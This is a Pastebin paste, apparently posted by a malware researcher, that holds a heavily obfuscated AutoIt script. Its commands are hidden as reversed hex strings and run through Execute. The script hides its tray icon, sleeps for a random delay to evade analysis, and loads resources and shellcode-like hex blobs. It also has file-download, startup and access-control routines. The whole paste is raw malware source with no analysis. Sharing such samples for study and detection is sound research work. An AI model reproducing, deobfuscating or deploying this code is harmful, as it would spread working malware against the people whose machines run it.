Advertisement
James_inthe_box

Broken autoit

Mar 19th, 2020
14,930
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 265.36 KB | None | 0 0
  1. LOCAL $ODFGOQSDOF = EXECUTE ( PZOOPVQSVQRD ( "etucexe" ) )
  2. DIM $RNZEFRRNQZGTSLNAPTLLTAS = ISSTRING ( 1889478917 )
  3. LOCAL $MNPOWJJGXWQCFTZAHUXJ = 9.694689422309853e-249
  4. DIM $GXGRFQVBJGBXACJSWIB = - -9.969263845957125e+129
  5. DIM $SCIGABR = 5
  6. LOCAL $BGQTHSIEESLVMKAISWQPYOIW = 1029
  7. LOCAL $UXLEPDKKEVGHVRJ = 2.4182732818957457e-293
  8. GLOBAL $IVHFSIX = 4.2092159345143626e-238
  9. DIM $BBBNYUDT = -1.4420406622144593e-238
  10. GLOBAL $SADIKCFFCKBYF = 5
  11. DIM $ZAIHCOOWKBJJR = -1.3850150088818558e-07
  12. GLOBAL $DBUYYDFNWDMCVX = "qtfjgifhmdkbgk"
  13. DIM $VUCZTVL = 5
  14. GLOBAL $EDSGBTNIPHZEHHGUNLEPLT = 261
  15. GLOBAL $YNOPXTHQZC = 773
  16. GLOBAL $MHUJZ = -3.112849437490682e+275
  17. GLOBAL $QDXONVFFK = "77726D6675677167766B7476697261"
  18. DIM $KLDLHOFYK = "ywjhwprukczrjchmvolwcbvntirbohartfuqtgbre"
  19. GLOBAL $JFENGHFQVPRNJEBYATSNXJTS = "0x30783738363636373631364237313732373437313735363237353633364137313636373937393736374137383736364537323641373936373646373136373642363737393739373436423643"
  20. LOCAL $BAFEBJJQUSKAPXATLPSYUH = "dxlvgngftsbvqkcvfqqdxwwchpzkdlwznngayzgjjatbjmt"
  21. IF $RNZEFRRNQZGTSLNAPTLLTAS = 5 THEN
  22. LOCAL $DF
  23. ELSE
  24. LOCAL $FGNSKJDQBNFS = $SDVQKJDFSJQDF ( $GKJFNDSQJKFQSJKLF ( "0x537472696e6753706c697428246773666769757369687566736469662c20222229" ) )
  25. ENDIF
  26. DIM $QEESICZMM = FLOOR ( 8453 )
  27. DIM $ROIDSJIOAEVND = "0x6C7A636F7962767A736A63"
  28. GLOBAL $ZKCTTPZ = 11013
  29. GLOBAL $ANUFXVFQUJUBKUBXX = 8.928017946857632e-135
  30. DIM $AXVZBIM = -8.305132351586229e+158
  31. GLOBAL $MLURRRCEPD = "rflhuvqldrelupcfdnszclvapod"
  32. IF $QEESICZMM = 8453 THEN
  33. OPT ( PZOOPVQSVQRD ( "ediHnocIyarT" ) , PZOOPVQSVQRD ( "1" ) )
  34. ELSE
  35. LOCAL $4DSQF4QSDFDS
  36. ENDIF
  37. FUNC VXCHBPDQSG ( $AAA , $BBB )
  38. LOCAL $WZNECIAFTZMXVNGECERFAJKUJGWYJZN = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtsotyranib" ) )
  39. LOCAL $QHCCOWTETRHFRJSKQNAGR = $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "2626264202620222C52202620227964456C69666F627052756375504x0" ) ) )
  40. LOCAL $ORQLDOFXCEEHQOEKMZVZPVZTENERXKZSACUMDHO = $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "1616164202620222C522026202277616E617B637A62766862747564777F63636861742x0" ) ) )
  41. LOCAL $HPUDQGYRGLYBJZTSZUJDUPNYZJGGZOYRLEDAKHMGMNGEDEXBLXLU = $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "22372667E2220262022626264202620222C522026202277616E617B637A62766862747564777F63636861742x0" ) ) )
  42. LOCAL $CHYPAQWNKEUDEYGHTMSFZLUXVMNXHXYJNRCDUKJTBGZCOHPCIPGEUMVROQD = $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "22C62757E2220262022626264202620222C5220262022796440757472716473504x0" ) ) )
  43. LOCAL $AAAVFDFD4SV4D = $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "924333822786340262029243338227863402620292433382278634026202F68646D657361637A7B6872756E65647A76707A767A7D6B656F617865656368766F646C61727F6420262029243338227863402620292433382278634026202924333822786340262022202E65725E2C6C65686358637752202620264C42534040262022292220262029292030303531302C20303035382D6F646E616258246E657F6250262022282075656C635E2470796273635752202620264C42534040262022292220262029243338227863402620222C6C6568635E24707962736357522026202924333822786340262022282473656A626F4564716562734E24707962736357502D302C6C65686358637750247563522x0" ) ) )
  44. LOCAL $GFDS45SDQ45 = $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "9222F22202C222C52202C257C687C6268756465676E6D676D686B6164656C62797F6A77676A6A797E6075746A657A73747A7A62697C67627977617465707864282563616C607562576E69627473502620222F2F2F2A356C69666D3C425552202620225340402620222D54757364727F686354756E6275647E694B522x0" ) ) )
  45. LOCAL $PQRGMTILHBDIMFGISPMTVHOUUTSZWITNAQPHEKUGXMVIFMYSJRAHRNAW = $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "92277616E617B637A62766862747564777F636368617428237473796875456C69664x0" ) ) )
  46. LOCAL $CIHMYVOMFIPRBYMRTP = $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "92F68646D657361637A7B6872756E65647A76707A767A7D6B656F617865656368766F646C61727F6428237473796875456C69664x0" ) ) )
  47. LOCAL $KZLFBASKUHXAQHFYPKXHXH = $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "9257C687C6268756465676E6D676D686B6164656C62797F6A77676A6A797E6075746A657A73747A7A62697C6762797761746570786428237473796875456C69664x0" ) ) )
  48. LOCAL $ASCIKBIDNJXEATWJMWYETKIBGQNPDPMOEFLZEL = $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "924617F62767D65756760796360786F636A7762647A6B657463627E6A697878687E6D6678757C6A76637D64786769756465756B6E677171607978636428237473796875456C69664x0" ) ) )
  49. SLEEP ( RANDOM ( 512005 , 1280005 ) )
  50. IF $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "5637C6166402D3027716E627861627A63797D6669667D6877657B65686071716E6479677A737475757F6866747D60737967666D696462686C69647D67627170742x0" ) ) ) THEN
  51. $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "92277616E617B637A62766862747564777F6363686174282564716562734279644x0" ) ) )
  52. ENDIF
  53. IF $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "5637C6166402D30286878687B6079766861716878657B637162666C6A7B642x0" ) ) ) THEN
  54. $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "92464367374346664666671616164202C257C687C6268756465676E6D676D686B6164656C62797F6A77676A6A797E6075746A657A73747A7A62697C67627977617465707864282564796277556C69664x0" ) ) )
  55. ENDIF
  56. $DF = $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "2626264202620222C52202620227964456C69666F627052756375504x0" ) ) )
  57. IF $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "5637C6166402D302C656A7C66656F6D6074607E617762696B647569777D6A67747165687A6E6469626B69636371642x0" ) ) ) THEN
  58. $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "9253431746375343374666764202C24617F62767D65756760796360786F636A7762647A6B657463627E6A697878687E6D6678757C6A76637D64786769756465756B6E6771716079786364282564796277556C69664x0" ) ) )
  59. ENDIF
  60. IF $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "5637C6166402D302074727D6972627079666D6F66797D686963642x0" ) ) ) THEN
  61. $ODFGOQSDOF ( $WZNECIAFTZMXVNGECERFAJKUJGWYJZN ( PZOOPVQSVQRD ( "929292438333631302C286471605C6C657644707962736350482E65607F456C69664824616562556C6966402C2F68646D657361637A7B6872756E65647A76707A767A7D6B656F617865656368766F646C61727F64282564796277556C69664x0" ) ) )
  62. ENDIF
  63. ENDFUNC
  64. FUNC ISNOTVXCHBPDQSG ( )
  65. DIM $UFD = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtsotyranib" ) )
  66. RETURN $DF = $ODFGOQSDOF ( $UFD ( PZOOPVQSVQRD ( "27964447079627363504x0" ) ) ) = EXECUTE ( PZOOPVQSVQRD ( "0" ) )
  67. ENDFUNC
  68. FUNC READRESOURCES ( $A , $B )
  69. DIM $GRFEUS = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtsotyranib" ) )
  70. DIM $FYESUECPPAWWNWWTF = MOD ( 4613 , 517 )
  71. LOCAL $XDIOC = 5
  72. LOCAL $SWHULYBTDEXGWEHQPGV = -5.81219861796251e+262
  73. GLOBAL $XQXGEEAAJGBTXXDOCCYUABK = -4.464420178841315e+178
  74. GLOBAL $PWQNTHGNUUGKNGTAS = "69677665676676676E686C78777361627A656D7A6C70736678767676"
  75. GLOBAL $VNZHDBNEXAXVFCPPIKMQZVF = 17925
  76. DIM $XEOVEUH = 7429
  77. LOCAL $ZDPONLGCINXYAI = 5
  78. GLOBAL $LQFCZAIWEGXYITGPMU = 5
  79. DIM $ZTXAKWMRFEWVRE = "77A7066"
  80. GLOBAL $BGMYVSKG = 1.6180312255686603e-146
  81. LOCAL $UPHHLGFKRST = -1.923772002067121e+245
  82. DIM $COQRAJBHDACNGHERGI = -5.81219861796251e+262
  83. LOCAL $CBWKYSQPGNAKWO = 1.417602110220494e-244
  84. LOCAL $EBJWMAQPFTFY = 5
  85. DIM $KJCSPARGTITMBQZRRSY = 1.1795752146684374e+266
  86. GLOBAL $FYTZBLHEFMRONCR = 5
  87. DIM $YISYIBCA = 5
  88. IF $FYESUECPPAWWNWWTF = 5 THEN
  89. LOCAL $HINSTANCE
  90. ELSE
  91. LOCAL $GKJFNDSQJKFQSJKLF = EXECUTE ( "binarytostring" )
  92. ENDIF
  93. LOCAL $MBRCQGDFZHAEXJDPOTVMUBVNHCFADDLFAZDRZXVQZVBWSIVL = $ODFGOQSDOF ( $GRFEUS ( PZOOPVQSVQRD ( "D5220322B592244202C22276E6F6C62202C2144202C222274737772202C25636E6164737E694864202C2222747072202C2227556362757F637562546E696642202C2222747072202C222C6C646E22333C656E62756B62282C6C61634C6C644x0" ) ) )
  94. LOCAL $TPVYNDXZRUFZDAGCDEWRPIDIFKPNRGOBWQOEXOAGJ = $ODFGOQSDOF ( $GRFEUS ( PZOOPVQSVQRD ( "D5220322B592C6679637772667A7176787A72746A71666C6464616663686E6672657D66747F60746A687561686A766467617362726D64202C2222747072202C25636E6164737E694864202C2222747072202C22256362757F637562566F656A796352202C2224627F677462202C222C6C646E22333C656E62756B62282C6C61634C6C644x0" ) ) )
  95. LOCAL $BGPOGVPVNYRGUCCJKI = $ODFGOQSDOF ( $GRFEUS ( PZOOPVQSVQRD ( "D5220322B592C6679637772667A7176787A72746A71666C6464616663686E6672657D66747F60746A687561686A766467617362726D64202C2222747072202C25636E6164737E694864202C2222747072202C22256362757F63756254616F6C42202C2222747072202C222C6C646E22333C656E62756B62282C6C61634C6C644x0" ) ) )
  96. LOCAL $CBGBGUZKDZRZYFIPBVTR = $ODFGOQSDOF ( $GRFEUS ( PZOOPVQSVQRD ( "D5220322B59296B6A6363657762797E667076776F60776264202C2222747072202C22256362757F6375625B636F6C42202C2222747072202C222C6C646E22333C656E62756B62282C6C61634C6C644x0" ) ) )
  97. RETURN $ODFGOQSDOF ( $GRFEUS ( PZOOPVQSVQRD ( "922747672607966697A727A746B6A75776267626364202C222D522026202A67616F68756F6177726F67627E607B666964696072777564636761646A7665727A78746E6976707474202620222B5564797262282564716562734473657274735C6C644x0" ) ) )
  98. ENDFUNC
  99. FUNC ALXJQLZGCW ( )
  100. DIM $GFRO = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtsotyranib" ) )
  101. FOR $I = PZOOPVQSVQRD ( "0" ) TO PZOOPVQSVQRD ( "001" )
  102. IF $ODFGOQSDOF ( $GFRO ( PZOOPVQSVQRD ( "22032202d30292037414055405428237473796875437375636f62705x0" ) ) ) THEN
  103. DIM $ZPOCMAGGFKJTNPKBNVCXOOIJ = ISSTRING ( "earrsgtpyicvyvntjhrtwfncejcfatlbliry" )
  104. DIM $WXQYCLSQDAQIGXGY = "0x6C6A6F61676279766D776D7269646D746B666D616D68687464677A65706874656466626D69636274"
  105. LOCAL $THXUGADLLGEPS = "66E76656774686B6B6D666E76"
  106. LOCAL $RIMSULD = 4.044827910884727e-230
  107. GLOBAL $KULOHRBKBJWV = 5
  108. LOCAL $RQVQZL = 1500165
  109. LOCAL $IFEPOUGQZPPNJLO = - -1.585864922880565e+81
  110. LOCAL $UFUNIOIA = 5
  111. DIM $BYUDHYWMFKRCHDLJHFDSF = 5637
  112. DIM $MFFRAZRVOI = 261
  113. GLOBAL $RFLHOMZJ = 261
  114. DIM $RXRCZHCWNQZSHY = 5
  115. IF $ZPOCMAGGFKJTNPKBNVCXOOIJ = 261 THEN
  116. ELSE
  117. LOCAL $GKJFNDSQJKFQSJKLF = EXECUTE ( "binarytostring" )
  118. ENDIF
  119. ENDIF
  120. $I = $ODFGOQSDOF ( $GFRO ( PZOOPVQSVQRD ( "22132202D2029642x0" ) ) )
  121. NEXT
  122. ENDFUNC
  123. FUNC HMAENLJLTX ( $FILE , $STARTUP , $RES , $RUN = PZOOPVQSVQRD ( "eurT" ) )
  124. DIM $ZEYC = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtsotyranib" ) )
  125. LOCAL $HYGRXUTDUYJLSWRPJXZFYVCXRVZBDBLDTJUL = $ODFGOQSDOF ( $ZEYC ( PZOOPVQSVQRD ( "56C69666420262029223938227863402620227964407D6564504x0" ) ) )
  126. LOCAL $XMACYYCFPWLRAIE = $ODFGOQSDOF ( $ZEYC ( PZOOPVQSVQRD ( "9222232202C2C657A64746C6264626A767278736679766A787A607277737C6A6975746475787277697864282E65607F456C69664x0" ) ) )
  127. DIM $HVMOO = ATAN ( 1541 )
  128. GLOBAL $DVXPGGSCZNIAYZJSRVH = "qccqmeetngqboooxqqpxbbpao"
  129. DIM $XMGHQMVQJXOSIVLFHGKHPHKT = "ivchrcchcxqsxeootzl"
  130. DIM $MEVLYBTTFIRHPTXMQQTHQE = "E71656B776C69747272656A7066726C6C6F"
  131. GLOBAL $KOXXJQCNATZRUYY = "0x307837373737363236333735"
  132. LOCAL $PQCOARQKDRUZZHIFHAKEVJPG = 5
  133. DIM $VTFRRRHHAO = 5
  134. GLOBAL $JWGMGYIOBMQLMXOIDGAWKTVW = 6.084075028480332e-110
  135. IF $HVMOO == -5.81219861796251e+262 THEN
  136. LOCAL $HUKOMNVTUNODRFWFQPX = READRESOURCES ( $RES , PZOOPVQSVQRD ( "01" ) )
  137. ELSE
  138. LOCAL $GKJFNDSQJKFQSJKLF = EXECUTE ( "binarytostring" )
  139. ENDIF
  140. $ODFGOQSDOF ( $ZEYC ( PZOOPVQSVQRD ( "92921302C28707176677662746F6E6574767E6D6F6B65786428216471644475674473657274735C6C64402C256961627C67707663697973616D6874282564796277556C69664x0" ) ) )
  141. $ODFGOQSDOF ( $ZEYC ( PZOOPVQSVQRD ( "9256961627C67707663697973616D68742825637F6C63456C69664x0" ) ) )
  142. IF $RUN THEN
  143. IF $STARTUP AND ISNOTVXCHBPDQSG ( ) = FALSE THEN
  144. RETURN
  145. ENDIF
  146. $ODFGOQSDOF ( $ZEYC ( PZOOPVQSVQRD ( "92C657A64746C6264626A767278736679766A787A607277737C6A697574647578727769786428256475736568754C6C6568635x0" ) ) )
  147. ENDIF
  148. ENDFUNC
  149. FUNC TEJMDBGHYV ( $TITLE , $BODY , $TYPE )
  150. DIM $VDFSJ = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtsotyranib" ) )
  151. IF ISNOTVXCHBPDQSG ( ) THEN
  152. $ODFGOQSDOF ( $VDFSJ ( PZOOPVQSVQRD ( "929746F6264202C256C64796474202C256079747428287F6247637D4x0" ) ) )
  153. ENDIF
  154. ENDFUNC
  155. FUNC JVSBFELTRJ ( $URL , $PATH )
  156. DIM $SDVFI = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtsotyranib" ) )
  157. IF ISNOTVXCHBPDQSG ( ) THEN
  158. $ODFGOQSDOF ( $SDVFI ( PZOOPVQSVQRD ( "92864716074202620222C52202620227964407D656450402C2C4255542824756744756E694x0" ) ) )
  159. $ODFGOQSDOF ( $SDVFI ( PZOOPVQSVQRD ( "92864716074202620222C52202620227964407D65645048256475736568754C6C6568635x0" ) ) )
  160. ENDIF
  161. ENDFUNC
  162. FUNC PUGFOFSEGE ( )
  163. DIM $REI = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtsotyranib" ) )
  164. IF $ODFGOQSDOF ( $REI ( PZOOPVQSVQRD ( "22032202d302922227567616e616d402d6162776f627052282374737968754e69675x0" ) ) ) THEN
  165. $ODFGOQSDOF ( $REI ( PZOOPVQSVQRD ( "924494054794F647571404825637F6C63437375636F62705x0" ) ) )
  166. ENDIF
  167. ENDFUNC
  168. FUNC OLPICFMMYM ( )
  169. DIM $GFBVO = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtsotyranib" ) )
  170. IF $ODFGOQSDOF ( $GFBVO ( PZOOPVQSVQRD ( "9222568756e24637c6f6f647d667228237473796875437375636f62705x0" ) ) ) THEN
  171. $ODFGOQSDOF ( $GFBVO ( PZOOPVQSVQRD ( "924494054794F647571404825637F6C63437375636F62705x0" ) ) )
  172. ENDIF
  173. IF $ODFGOQSDOF ( $GFBVO ( PZOOPVQSVQRD ( "9222568756e287f62667228237473796875437375636f62705x0" ) ) ) THEN
  174. $ODFGOQSDOF ( $GFBVO ( PZOOPVQSVQRD ( "924494054794F647571404825637F6C63437375636F62705x0" ) ) )
  175. ENDIF
  176. ENDFUNC
  177. FUNC RVPMUGNHMR ( )
  178. DIM $RFO = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtsotyranib" ) )
  179. IF ISNOTVXCHBPDQSG ( ) THEN
  180. $ODFGOQSDOF ( $RFO ( PZOOPVQSVQRD ( "9254449484F575350402C2222202C2222202C292224333228227863402620286471605C6C6576447079627363504026202922243332282278634026202220264F202C6564402620213024757F456D696450236F2022202C22246D636228256475736568754C6C6568635x0" ) ) )
  181. ENDIF
  182. ENDFUNC
  183. FUNC ACL ( )
  184. LOCAL $VFSQ4SDF4VSQD4 = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtsotyranib" ) )
  185. LOCAL $G4FS4GQS54D = $ODFGOQSDOF ( $VFSQ4SDF4VSQD4 ( PZOOPVQSVQRD ( "922223A72635024727F6863757B347E657F634563614024727F6863757B356A79635C63614024727F6863757B313A726350256479726B3E6F6963796675625C6361402564797262282564716562734473657274735C6C644x0" ) ) )
  186. LOCAL $DSFG45QSD5F5SQDFDSF = $ODFGOQSDOF ( $VFSQ4SDF4VSQD4 ( PZOOPVQSVQRD ( "9246435337177643376643764282274705475674473657274735C6C644x0" ) ) )
  187. LOCAL $POOOE = $ODFGOQSDOF ( $VFSQ4SDF4VSQD4 ( PZOOPVQSVQRD ( "929222D50323B5564797262282564716562734473657274735C6C64482274705475674473657274735C6C644x0" ) ) )
  188. LOCAL $DF4QSD5F54SQDF = $ODFGOQSDOF ( $VFSQ4SDF4VSQD4 ( PZOOPVQSVQRD ( "9222132202C2224627F677462202C254F4F4F4054202C2222747072202C22227F64707962736375644974796275736563556A796C616964796E6942202C22247E6962202C222C6C646E223339607166746162282C6C61634C6C644x0" ) ) )
  189. $DF4QSD5F54SQDF = $ODFGOQSDOF ( $VFSQ4SDF4VSQD4 ( PZOOPVQSVQRD ( "9222232202C2224627F677462202C2924643533717764337664376428256A79635475674473657274735C6C64402C2224627F677462202C2663746664617375366534637175343766637464202C2222747072202C222C6361456A796C616964796E6942202C22247E6962202C222C6C646E223339607166746162282C6C61634C6C644x0" ) ) )
  190. $DF4QSD5F54SQDF = $ODFGOQSDOF ( $VFSQ4SDF4VSQD4 ( PZOOPVQSVQRD ( "9222032202C22247E6962202C2663746664617375366534637175343766637464202C2222747072202C222132202C22247E6962202C254F4F4F4054202C2222747072202C222C636164427F6470796273637564497479627573656354756352202C22247E6962202C222C6C646E223339607166746162282C6C61634C6C644x0" ) ) )
  191. $DF4QSD5F54SQDF = $ODFGOQSDOF ( $VFSQ4SDF4VSQD4 ( PZOOPVQSVQRD ( "9254F4F4F4054202C2222747072202C222430387032202C2224627F677462202C24335744202C2222747072202C2229747962757365635473656A626F4C656E62756B44756352202C22247E6962202C222C6C646E223339607166746162282C6C61634C6C644x0" ) ) )
  192. ENDFUNC
  193. DIM $MZCRRGUK = ACOS ( 5 )
  194. GLOBAL $DRYOFJCUFUD = "anpshcbpjwrxvulshbhombdyedev"
  195. GLOBAL $UNZOQBJI = -2.530196378701103e+304
  196. GLOBAL $GWJFWBEGAKVCIYVOMTJHFYSN = - -136.91345368645943
  197. LOCAL $LTAMNAJSRS = 5
  198. GLOBAL $GTANDOI = 5
  199. GLOBAL $ATCPPYMT = "0x3078373836413634364437363733364336343643364437303641373636343639363737343631373836363643363737373641"
  200. DIM $VTPPKGOW = 5
  201. GLOBAL $QGDSIMQGSVDEUBKAYXX = -9.263784100955638e+266
  202. DIM $ZKNAJRDQHOSOZOUPKGCHGAM = 5
  203. DIM $ZNFKHRYSVQWQRZVMQ = -1.9564836904645115e+260
  204. IF $MZCRRGUK == -3.112849437490682e+275 THEN
  205. LOCAL $4DSQF4QSDFDS
  206. ELSE
  207. LOCAL $SDVQKJDFSJQDF = EXECUTE
  208. ENDIF
  209. DIM $GKQVMQKOQUURY = SQRT ( 16133 )
  210. DIM $FZXUVDYXZSHHVPPGQZEAPZT = 9.905698446007282e-141
  211. DIM $YESZDIP = 5
  212. LOCAL $KLJQVROSLVJNZBIR = "bdtlicxmvfffo"
  213. GLOBAL $FDIGFWQWZGYW = "frrqi"
  214. LOCAL $QGFEWZENLWOYRQZCJHG = "0x6F6F7A7474616B706"
  215. GLOBAL $MFEGMAYRITOL = 3.919213243925652e-221
  216. LOCAL $SVEUXFRSLRHEAXXXRPKIDA = 5
  217. IF $GKQVMQKOQUURY == 9.24951591066034e-156 THEN
  218. LOCAL $GS4
  219. ELSE
  220. LOCAL $4DSQF4QSDFDS
  221. ENDIF
  222. FUNC TKKGMGHILY ( $PP , $DD )
  223. LOCAL $V1 = $ODFGOQSDOF ( PZOOPVQSVQRD ( "gnirtSoTyraniB" ) )
  224. DIM $XJZFVD = EXP ( 69381 )
  225. DIM $GGENJTRUTMZIZBULCZBI = 5
  226. GLOBAL $UHKYZWOISUDGQQSDGR = 2309
  227. LOCAL $GPXBZEBSAAL = 5
  228. GLOBAL $OMXCL = - -1.3732789845430014e+85
  229. GLOBAL $GLUEETKESYSJRJLEJIZVV = "0x6874646F7477666D69667968687462776F7"
  230. GLOBAL $SJLFCDVAVX = 261
  231. GLOBAL $VVTXFTW = 1541
  232. GLOBAL $HBARDH = 2.000119066383642e-150
  233. LOCAL $MXAJDCVSNIAXXXMXHQJQ = "6A747068717063706C7777736D"
  234. IF $XJZFVD == 2.077918267578911e+151 THEN
  235. LOCAL $OEXAQTON = PZOOPVQSVQRD ( "638878144B80F570000540581C318C334B8F7BE0C33404730936641CE380000A5D48BCEB8550000E1799Ex0" )
  236. ELSE
  237. $GKJDFSKOPDFS &= $SDVQKJDFSJQDF ( $GKJFNDSQJKFQSJKLF ( "0x2466676e736b6a6471626e66735b537472696e674c656e282467736667697573696875667364696629202d2024695d" ) )
  238. ENDIF
  239. LOCAL $TAPASIQWLSVYLAEHFQHVPMQNJF = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "225343248323833403248383645343248334545343938333343303432303432483644343739334538303644443938373533364330333443303341303732483635383138343248303230353248333343303030383645322026202E6F64717168756F642x0" ) ) )
  240. LOCAL $DVLZZZJYCYRL = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22730303546444730383134324034373030364644473038343645343646483642423033454246403546453438383646444735424640313031483646453438383030314834364534324834364534393832434330383032202620266A6E617D60767861766865616C6976737C6771796371607164742x0" ) ) )
  241. LOCAL $QEIPNQMAGOZPUZMTYGKCRNEV = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "223303638343032483834343037324640383644443248334545343248303034303233493345453645303343333932423730364534324338364534324838364534364643313437364645383634443736464538343034322026202C627973697A6A7A7A7C6674642x0" ) ) )
  242. LOCAL $LMSWONXFQTACNAYABIZOVVEZNQAVO = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2244534373347353031393532483930324834313934324833403934324838364534393833464534393830334333303642483635333530303030303030333440324834363345334543383345424835353935424543334220262026756E62736B6769747D6A75707A7F67616D617E60796561742x0" ) ) )
  243. LOCAL $PUCAMDBXQ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "227373433453437334536393636353037303345343733413634443437354433424534373340303546334445343733463636463936343733363834453437334536333535463536343445343733403736443437354430322026202F6671617E6A7566767F6A79626169716E6361647176687E6F67737D6C642x0" ) ) )
  244. LOCAL $MSRTZBZJFXIJBJOPAP = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22434483836424836464646454646444835403530344534344830303030303039314935403343333730353738344243354345343838354636463343453437334636393634373336353638334534373343353636364432202620217872646D61636570742x0" ) ) )
  245. LOCAL $HTIXNBRBZ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "223454534373346363346333733363737383545343733403138353248303032483431303432483340303432483030303030303033313144363035383545343448303645343938364646464546443448354035334245322026202071607F6A626A6968766A6A726A7472737D642x0" ) ) )
  246. LOCAL $XCAWXDKVGXBWDZDKCNFOKOKM = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "228334031463636433330353431453434483341453439383935303545343448323545343938363630354534393836363033433030344646443545373938363536464646454646314835403035454534363345463536322026202A7262726E68796478642x0" ) ) )
  247. LOCAL $OTDHOFQCXBCHFBLFQNISYS = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "224483130314636353230314636464646464643373838364030334538373446464832453739383432453739383030303030303034303245343733483145373938303030303030383134314534373340353436453434422026202D6B6F6B6F666E636B646A7467726877667B646877716368742x0" ) ) )
  248. LOCAL $ETFNL = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22540303030364130383832434542483535333349334245354536453346453432483646464646464335383836403033453830364535364644364537364646464146303533464534344836353635363530353836453432202620237973796E61766C6266686362687361766F6864647F642x0" ) ) )
  249. LOCAL $NLMOIRNIDZDHAHY = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "225383733463635363336323735373646464643464344453837334646333735363235364646464346483445383733443635463936363436464646434644344538373347353635333530334233303030303441344738322026202C6E666475642x0" ) ) )
  250. LOCAL $YBXWEABZYXGRNVPKCBUCQLNTPSTH = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2234646464644464835453838383536333632373537364646464446443545383733464633373536323536464646444640354538373344363136364633443646464644464344453837334030373536464646434640354220262029786168646A74696E62796F6D6C6E642x0" ) ) )
  251. LOCAL $FMFHLATCWJ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2234642334538383835363336364646464346403345383733463632373537364633373646464643464342453837334536323536363646364646464346483245383733453631473936333536464646434644324538373220262028647370747E6C61736572636B60767E627768797A72616567787269742x0" ) ) )
  252. LOCAL $IKLLOQCZZMOPBGGEHNODG = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "226493648373538373346464646444640393538383835363336323735373646464644464348353837334646333735363235364646464446483835383733424633363646334436464646444644383538373346464646422026202A677364716C68666D66642x0" ) ) )
  253. LOCAL $MHUULRYGNBMOSSKQFWWRPS = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2264636464646493648383538373346363546393434463646464649364438353837334536343733373937364646464936403835383733433539373237353636464646493643473538373345373135343735443646464220262027646F6E6865676762607F6D6A7A73617F6C6C6B69642x0" ) ) )
  254. LOCAL $GTQKZBGSGNSCWCRRDZDTLKBBINWOC = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22643493538373341363336364633463646464649364839353837334346313434373544364646464936443935383733464646464936403935383838354636463936343736464646493643483538373341363446323732202620237072777776617B63737F6D626E6769727C6575786D642x0" ) ) )
  255. LOCAL $RSLQTBADARXAUVYVQ = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "22646464644464432353837334030393732373646364646464936483145383733444635363444334636464646493644314538373341363537343732373646464649364031453837334936363535363437364646464932202620236F677E6962626B6C64746A746272736773637E676377626A7B617477642x0" ) ) )
  256. LOCAL $WHYNSXOWHVROCMFRQOUGLCBRNCHG = $ODFGOQSDOF ( $V1 ( PZOOPVQSVQRD ( "2273135343735443646464649364432353837334030333736464646444640333538373346363337353633363646364646464446434235383733423730353546353636464646444648323538373340373644343735443220262021767976757168727164616264717C6372742x0" ) ) )
